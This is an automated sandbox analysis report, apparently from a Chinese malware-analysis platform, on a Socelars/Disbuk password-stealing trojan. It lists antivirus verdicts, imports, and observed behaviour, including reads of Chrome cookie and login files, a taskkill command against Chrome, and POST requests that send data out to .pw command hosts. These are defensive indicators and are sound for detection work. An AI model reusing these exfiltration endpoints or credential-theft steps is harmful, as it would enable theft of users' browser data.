10.6
0-day
54 个模型检测该样本为恶意!
重新分析
更多

953367b0ce6b0ebf5dda2477828e5a7750b072700d9c96c29136f152d0c3f489

7f9a498cc692f9f3f0cfe241c80e8ad8.exe

分析耗时

74s

最近分析

文件大小

1.4MB
静态报毒 动态报毒 AGEN AI SCORE=87 AIDETECTVM ALTA ATTRIBUTE BARYS CONFIDENCE DISBUK EXTENSION GENERICRXLT HIGH CONFIDENCE HIGHCONFIDENCE KFIH MALWARE1 MALWARE@#1DSW0SVBTYQW8 OJZDQNX2GBQ R002C0WHM20 R349445 SCORE SOCELARS SUSGEN TIGGRE TROJANPWS UNSAFE W10@AYJEANMJ ZEXAF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba TrojanSpy:Win32/Socelars.cacce7a7 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Kingsoft 20201028 2013.8.14.323
McAfee GenericRXLT-RQ!7F9A498CC692 20201028 6.0.6.653
Tencent Script.Adware.Extension.Alta 20201028 1.0.0.1
CrowdStrike win/malicious_confidence_60% (W) 20190702 1.0
静态指标
Queries for the computername (2 个事件)
Time & API Arguments Status Return Repeated
1620808774.343625
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620811551.421375
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Command line console output was observed (1 个事件)
Time & API Arguments Status Return Repeated
1620811551.953375
WriteConsoleW
buffer: 错误: 没有找到进程 "chrome.exe"。
console_handle: 0x0000000b
success 1 0
This executable has a PDB path (1 个事件)
pdb_path F:\facebook_svn\trunk\database\Release\searzar.pdb
Tries to locate where the browsers are installed (2 个事件)
file C:\Program Files\Google\Chrome\Application\89.0.4389.114\resources.pak
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 个事件)
section .gtkstar
The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)
resource name ZIP
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 个事件)
suspicious_features POST method with no referer header suspicious_request POST http://www.nicekkk.pw/Home/Index/getdata
suspicious_features POST method with no referer header suspicious_request POST http://www.dwedfe.pw/Home/Index/lkdinl
Performs some HTTP requests (2 个事件)
request POST http://www.nicekkk.pw/Home/Index/getdata
request POST http://www.dwedfe.pw/Home/Index/lkdinl
Sends data using the HTTP POST Method (2 个事件)
request POST http://www.nicekkk.pw/Home/Index/getdata
request POST http://www.dwedfe.pw/Home/Index/lkdinl
Resolves a suspicious Top Level Domain (TLD) (3 个事件)
domain www.dwedfe.pw description Palau domain TLD
domain www.nicekkk.pw description Palau domain TLD
domain www.ipcode.pw description Palau domain TLD
Steals private information from local Internet browsers (4 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Profile 1\Cookies
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions
Foreign language identified in PE resource (4 个事件)
name ZIP language LANG_CHINESE offset 0x0014eb50 filetype Zip archive data, at least v1.0 to extract sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000d81e
name RT_ICON language LANG_CHINESE offset 0x0013e180 filetype dBase III DBT, version number 0, next free block index 40 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00010828
name RT_GROUP_ICON language LANG_CHINESE offset 0x0014e9a8 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000014
name RT_VERSION language LANG_CHINESE offset 0x0014e9c0 filetype PGP symmetric key encrypted data - Plaintext or unencrypted data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
Creates a suspicious process (1 个事件)
cmdline cmd.exe /c taskkill /f /im chrome.exe
Executes one or more WMI queries (1 个事件)
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1620808744.968625
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Checks for the Locally Unique Identifier on the system for a suspicious privilege (17 个事件)
Time & API Arguments Status Return Repeated
1620808743.968625
LookupPrivilegeValueW
system_name:
privilege_name: SeCreateTokenPrivilege
success 1 0
1620808743.968625
LookupPrivilegeValueW
system_name:
privilege_name: SeAssignPrimaryTokenPrivilege
success 1 0
1620808743.999625
LookupPrivilegeValueW
system_name:
privilege_name: SeMachineAccountPrivilege
success 1 0
1620808743.999625
LookupPrivilegeValueW
system_name:
privilege_name: SeTcbPrivilege
success 1 0
1620808743.999625
LookupPrivilegeValueW
system_name:
privilege_name: SeSecurityPrivilege
success 1 0
1620808743.999625
LookupPrivilegeValueW
system_name:
privilege_name: SeTakeOwnershipPrivilege
success 1 0
1620808744.015625
LookupPrivilegeValueW
system_name:
privilege_name: SeLoadDriverPrivilege
success 1 0
1620808744.015625
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1620808744.015625
LookupPrivilegeValueW
system_name:
privilege_name: SeRestorePrivilege
success 1 0
1620808744.015625
LookupPrivilegeValueW
system_name:
privilege_name: SeShutdownPrivilege
success 1 0
1620808744.030625
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
1620808744.030625
LookupPrivilegeValueW
system_name:
privilege_name: SeRemoteShutdownPrivilege
success 1 0
1620808744.030625
LookupPrivilegeValueW
system_name:
privilege_name: SeEnableDelegationPrivilege
success 1 0
1620808744.030625
LookupPrivilegeValueW
system_name:
privilege_name: SeManageVolumePrivilege
success 1 0
1620808744.030625
LookupPrivilegeValueW
system_name:
privilege_name: SeCreateGlobalPrivilege
success 1 0
1620808744.030625
LookupPrivilegeValueW
system_name:
privilege_name: SeTrustedCredManAccessPrivilege
success 1 0
1620811551.421375
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
Queries for potentially installed applications (4 个事件)
Time & API Arguments Status Return Repeated
1620808774.343625
RegOpenKeyExW
access: 0x00000001
base_handle: 0x80000001
key_handle: 0x00000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
options: 0
failed 2 0
1620808774.343625
RegOpenKeyExW
access: 0x00000001
base_handle: 0x80000001
key_handle: 0x00000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
options: 0
failed 2 0
1620808774.343625
RegOpenKeyExW
access: 0x00000001
base_handle: 0x80000002
key_handle: 0x000004b4
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
options: 0
success 0 0
1620808774.343625
RegOpenKeyExW
access: 0x00000001
base_handle: 0x80000002
key_handle: 0x000004b4
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
options: 0
success 0 0
Uses Windows utilities for basic Windows functionality (2 个事件)
cmdline taskkill /f /im chrome.exe
cmdline cmd.exe /c taskkill /f /im chrome.exe
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1620808750.374625
RegSetValueExA
key_handle: 0x00000358
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1620808750.374625
RegSetValueExA
key_handle: 0x00000358
value: ÀM«DÓF×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1620808750.374625
RegSetValueExA
key_handle: 0x00000358
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1620808750.374625
RegSetValueExW
key_handle: 0x00000358
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1620808750.374625
RegSetValueExA
key_handle: 0x00000370
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1620808750.374625
RegSetValueExA
key_handle: 0x00000370
value: ÀM«DÓF×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1620808750.374625
RegSetValueExA
key_handle: 0x00000370
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1620808750.593625
RegSetValueExW
key_handle: 0x00000354
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Generates some ICMP traffic
File has been identified by 54 AntiVirus engines on VirusTotal as malicious (50 out of 54 个事件)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Barys.64724
FireEye Generic.mg.7f9a498cc692f9f3
CAT-QuickHeal Trojanpws.Disbuk
ALYac Gen:Variant.Barys.64724
Cylance Unsafe
VIPRE Trojan.Win32.Generic!BT
Sangfor Malware
K7AntiVirus Spyware ( 005484541 )
Alibaba TrojanSpy:Win32/Socelars.cacce7a7
K7GW Spyware ( 005484541 )
Cybereason malicious.cc692f
Arcabit Trojan.Barys.DFCD4
TrendMicro TROJ_GEN.R002C0WHM20
Cyren W32/Trojan.KFIH-7244
Symantec ML.Attribute.HighConfidence
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 85)
Kaspersky not-a-virus:AdWare.Script.Extension.a
BitDefender Gen:Variant.Barys.64724
AegisLab Trojan.Win32.Disbuk.i!c
Ad-Aware Gen:Variant.Barys.64724
Sophos Mal/Generic-S
Comodo Malware@#1dsw0svbtyqw8
F-Secure Heuristic.HEUR/AGEN.1124060
DrWeb Trojan.PWS.Stealer.29132
Zillya Trojan.Socelars.Win32.624
Invincea Mal/Generic-S
MaxSecure Trojan.Malware.74718079.susgen
Emsisoft Gen:Variant.Barys.64724 (B)
Ikarus Trojan-Spy.Agent
Jiangmin Trojan.PSW.Disbuk.ce
Webroot W32.Trojan.Tiggre
Avira HEUR/AGEN.1124060
Antiy-AVL Trojan[PSW]/Win32.Disbuk
Microsoft TrojanSpy:Win32/Socelars!MSR
ZoneAlarm HEUR:Trojan-PSW.Win32.Disbuk.vho
GData Gen:Variant.Barys.64724
AhnLab-V3 Trojan/Win32.Disbuk.R349445
McAfee GenericRXLT-RQ!7F9A498CC692
MAX malware (ai score=87)
VBA32 suspected of Trojan.Downloader.gen.h
Malwarebytes Spyware.Socelars
ESET-NOD32 a variant of Win32/Spy.Socelars.S
TrendMicro-HouseCall TROJ_GEN.R002C0WHM20
Tencent Script.Adware.Extension.Alta
Yandex TrojanSpy.Socelars!OjZdQNx2GbQ
Fortinet W32/Disbuk.VHO!tr.pws
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 个事件)
dead_host 172.217.24.14:443
dead_host 172.217.160.78:443
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-08-20 16:57:13

Imports

Library KERNEL32.dll:
0x509018 MultiByteToWideChar
0x50901c WideCharToMultiByte
0x509020 GetProcAddress
0x509024 LoadLibraryW
0x509028 GetShortPathNameA
0x509030 GetTempPathA
0x509034 GetLastError
0x509038 HeapAlloc
0x50903c GetProcessHeap
0x509040 Sleep
0x509044 GetTickCount
0x509048 FreeLibrary
0x50904c LoadResource
0x509054 SizeofResource
0x509058 FindResourceW
0x50905c LocalAlloc
0x509060 WinExec
0x509064 GetComputerNameW
0x509068 GetModuleFileNameA
0x50906c GetCurrentProcessId
0x509070 OpenProcess
0x509078 CopyFileW
0x50907c SetStdHandle
0x50908c GetOEMCP
0x509090 GetCurrentProcess
0x509094 DuplicateHandle
0x509098 CloseHandle
0x50909c WriteFile
0x5090a0 SetFileTime
0x5090a4 ReadFile
0x5090a8 SetFilePointer
0x5090ac GetFileType
0x5090b0 CreateFileW
0x5090b4 CreateDirectoryW
0x5090b8 LockResource
0x5090c0 GetACP
0x5090c4 IsValidCodePage
0x5090c8 FindNextFileW
0x5090cc FindFirstFileExW
0x5090d0 FindClose
0x5090d8 GetFileSizeEx
0x5090dc GetConsoleCP
0x5090e0 SetFilePointerEx
0x5090e4 ReadConsoleW
0x5090e8 GetConsoleMode
0x5090ec EnumSystemLocalesW
0x5090f0 GetUserDefaultLCID
0x5090f4 IsValidLocale
0x5090f8 GetCommandLineW
0x5090fc GetCommandLineA
0x509100 AreFileApisANSI
0x509108 HeapCreate
0x50910c HeapFree
0x509114 GetFullPathNameW
0x509118 GetDiskFreeSpaceW
0x50911c OutputDebugStringA
0x509120 LockFile
0x50912c GetFullPathNameA
0x509130 SetEndOfFile
0x509134 UnlockFileEx
0x509138 GetTempPathW
0x50913c CreateMutexW
0x509140 WaitForSingleObject
0x509144 GetFileAttributesW
0x509148 GetCurrentThreadId
0x50914c UnmapViewOfFile
0x509150 HeapValidate
0x509154 HeapSize
0x509158 FormatMessageW
0x50915c GetDiskFreeSpaceA
0x509160 GetFileAttributesA
0x509168 OutputDebugStringW
0x50916c FlushViewOfFile
0x509170 CreateFileA
0x509174 LoadLibraryA
0x50917c DeleteFileA
0x509180 DeleteFileW
0x509184 HeapReAlloc
0x509188 GetSystemInfo
0x50918c HeapCompact
0x509190 HeapDestroy
0x509194 UnlockFile
0x509198 LocalFree
0x50919c LockFileEx
0x5091a0 GetFileSize
0x5091ac GetSystemTime
0x5091b0 FormatMessageA
0x5091b4 CreateFileMappingW
0x5091b8 MapViewOfFile
0x5091c0 FlushFileBuffers
0x5091cc TerminateProcess
0x5091d8 SetEvent
0x5091dc ResetEvent
0x5091e0 CreateEventW
0x5091e4 GetModuleHandleW
0x5091e8 IsDebuggerPresent
0x5091ec GetStartupInfoW
0x5091f0 InitializeSListHead
0x5091f4 EncodePointer
0x5091f8 DecodePointer
0x5091fc SetLastError
0x509200 SwitchToThread
0x509204 TlsAlloc
0x509208 TlsGetValue
0x50920c TlsSetValue
0x509210 TlsFree
0x509214 GetCPInfo
0x509218 CompareStringW
0x50921c LCMapStringW
0x509220 GetLocaleInfoW
0x509224 GetStringTypeW
0x509228 RaiseException
0x50922c RtlUnwind
0x509230 LoadLibraryExW
0x509234 CreateThread
0x509238 ExitThread
0x509240 GetModuleHandleExW
0x509244 ExitProcess
0x509248 GetModuleFileNameW
0x50924c GetStdHandle
0x509250 WriteConsoleW
Library ADVAPI32.dll:
0x509004 OpenProcessToken
0x509008 LookupAccountNameW
Library SHELL32.dll:
0x509260 ShellExecuteExA
Library WININET.dll:
Library NETAPI32.dll:
0x509258 Netbios

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49181 18.235.92.123 www.nicekkk.pw 80
192.168.56.101 49186 50.17.5.224 www.dwedfe.pw 80
192.168.56.101 49178 88.99.66.31 iplogger.org 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 54178 114.114.114.114 53
192.168.56.101 58970 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 60215 114.114.114.114 53
192.168.56.101 60221 114.114.114.114 53
192.168.56.101 61680 114.114.114.114 53
192.168.56.101 63429 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 50568 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 53380 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56539 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://www.dwedfe.pw/Home/Index/lkdinl 
POST /Home/Index/lkdinl HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.dwedfe.pw
Content-Length: 221
Cache-Control: no-cache

JSON=lY6u/p5W3ENhehiE5BeMQxJ+xNSD/+tH4Ppl2wdu1U7vc2malUsEB+ORmZS6lP/cAGsnBh0moq8witnIgq9AUEg1qhONYOV3C02wYx3B069vTH5sFH8NQvvdWQ9R9bWKBwbfuzzH6fZV/qBKCvpLU8ymIFOJz0kyCnyTWbz0Ra7guEoPJhH7+CVTzn/RkHX7QwT+s8NfoAgoPNkZpVjgjA==
http://www.nicekkk.pw/Home/Index/getdata 
POST /Home/Index/getdata HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.nicekkk.pw
Content-Length: 477
Cache-Control: no-cache

JSON=tXNHCHMR5lzYrrTs/aX+4uNIiB6bvS672IwMB2lYvYHQc66Mp8UIbhF5kVVb4UWfzn98OkFNiNddN8GRyWnxDTiBqvQSO6TR4um5KK3Xhdj/3PTtH/7O+aI6meRvbJFNbjJnKPNf5wQq3Sd7QKn3lvStP0GLPKuingQrazomzGIsroY9fXHkmXtWuhAHraZ7bFEA+sIrINaaou6XuHDUjNQLPMNIHdk8drnD6uOodQ/Gga3kdx5mEy7EIoo4CPHAdH7fF7kNAIiFmml1BQBAaS8NviZpMQ8Hm3SMGF3pbsfyY0wHszek4QIEUC2JQb+HGvbOg7EPJCgbQg5PJU4N+2+0IhIlxcK8MR5zR0Ri/3+APbuEtYp3k3Xu25pFvOahnooXfqsBiIfURIujMMKlU8IX6F13XyYoTyk8FFjQiNFngLSiXeh4N2pYlstfKbU17/cgB6RbikgXWCpPEAuVGw==

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.